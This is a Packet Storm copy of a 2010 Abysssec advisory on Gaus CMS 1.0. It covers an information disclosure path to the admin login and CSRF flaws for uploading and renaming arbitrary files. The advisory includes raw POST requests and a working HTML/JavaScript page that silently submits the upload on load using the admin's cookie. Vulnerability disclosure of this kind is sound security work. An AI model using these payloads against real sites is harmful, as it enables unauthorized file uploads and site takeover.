exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Month Of Abysssec Undisclosed Bugs - Gaus CMS 1.0

Month Of Abysssec Undisclosed Bugs - Gaus CMS 1.0
Posted Sep 23, 2010
Authored by Abysssec | Site abysssec.com

Month Of Abysssec Undisclosed Bugs - Gaus CMS version 1.0 suffers from information disclosure and cross site request forgery vulnerabilities.

tags | exploit, vulnerability, info disclosure, csrf
SHA-256 | 1cfbaf5b4134648ceef884bae938c41ca9c2aa51e47a794126ac448f26f98f6c

Month Of Abysssec Undisclosed Bugs - Gaus CMS 1.0

Change Mirror Download
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/

http://www.exploit-db.com/moaub-21-gauscms-multiple-vulnerabilities/

'''

Abysssec Inc Public Advisory


Title : gausCMS Multiple Vulnerabilities
Affected Version : Gaus CMS version 1.0
Discovery : www.abysssec.com
Vendor : http://www.gaustudio.com/gausCMS.html
Download Links : http://sourceforge.net/projects/gauscms/


Description :
===========================================================================================
This version of gausCMS have Multiple Valnerabilities :
1- Access to Admin's Login and Information Disclosure
2- CSRF Upload arbitrary file and rename file


Access to Admin's Section and Information Disclosure:
===========================================================================================
With this path you can easily access to Admin's Login:

http://Example.com/admin_includes/template/languages/english/english.txt


Vulnerable Code:
http://Example.com/default.asp
Ln 37:
Set oFile = FSO.GetFile(PATHADMIN & "admin_includes/template/languages/" & GUILanguage & "/" & GUILanguage & ".txt")




CSRF Upload arbitrary file and rename file
===========================================================================================
With send a POST request to this path, you can upload arbitrary file of course by Admin's cookie
and by CSRF technique.

http://Example.com/default.asp?dir=&toDo=uploadFile



For example you can feed this POST Request to Admin :

POST http://Example.com/default.asp?dir=&toDo=uploadFile HTTP/1.1
Host: Example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://Example.com/default.asp?dir=&toDo=uploadFile
Cookie: Skin=default; ASPSESSIONIDQSASTTBS=EIPNNJIAKDDEAGDKACICOBHJ
Content-Type: multipart/form-data; boundary=---------------------------287032381131322
Content-Length: 306

Message Body:

-----------------------------287032381131322
Content-Disposition: form-data; name="attach1"; filename="Test.txt"
Content-Type: text/plain

123
-----------------------------287032381131322
Content-Disposition: form-data; name="toDo"

Upload File
-----------------------------287032381131322--



----------------------------------------------------------------------------------

With the same method we can rename files with following path:

http://Example.com/default.asp?dir=&file=Test2.txt&toDo=Rename%20File

For example you can feed this POST Request to Admin:

POST http://Example.com/default.asp?dir=&file=Test.txt&toDo=Rename%20File HTTP/1.1
Host: Example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://Example.com/default.asp?dir=&file=Test2.txt&toDo=rename
Cookie: Skin=default; ASPSESSIONIDQSASTTBS=IIPNNJIANIKOIKGOGOIKAJGE
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

Message Body:

newFileName=Test2.txt&toDo=Rename+File




The Source of HTML Page (Malicious Link) for Upload Arbitrary file
===========================================================================================
With this page, we send a POST request with AJAX to upload a file with Admin's Cookie.


<html>
<head>
<title >Wellcome to gausCMS!</title>
Hello!
...
...
...
This page uploads a file

<script>

var binary;
var filename;

function FileUpload() {
try {
netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");
} catch (e) {
}

var http = false;
if (window.XMLHttpRequest) {
http = new XMLHttpRequest();
}
else if (window.ActiveXObject) {
http = new ActiveXObject("Microsoft.XMLHTTP");
}

var url = "http://Example.com/default.asp?dir=&toDo=uploadFile";
var filename = 'Test.txt';
var filetext = ' 123 ';

var boundaryString = '---------------------------287032381131322';
var boundary = '--' + boundaryString;
var requestbody = boundary + '\n'
+ 'Content-Disposition: form-data; name="attach1"; filename="'
+ filename + '"' + '\n'
+ 'Content-Type: text/plain' + '\n'
+ '\n'
+ filetext
+ '\n'
+ boundaryString
+ 'Content-Disposition: form-data; name="toDo"'
+'Upload File'
+ '\n'
+ boundary;

http.onreadystatechange = done;
http.open('POST', url, true);

http.setRequestHeader("Content-type", "multipart/form-data; boundary=" + boundaryString);
http.setRequestHeader("Connection", "close");
http.setRequestHeader("Content-length", requestbody.length);
http.send(requestbody);
}
function done() {
if (http.readyState == 4 && http.status == 200) {
//alert(http.responseText);
//alert('Upload OK');
}
}
</script>
</head>
<body onload ="FileUpload();">
</body>
</html>


===========================================================================================

Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close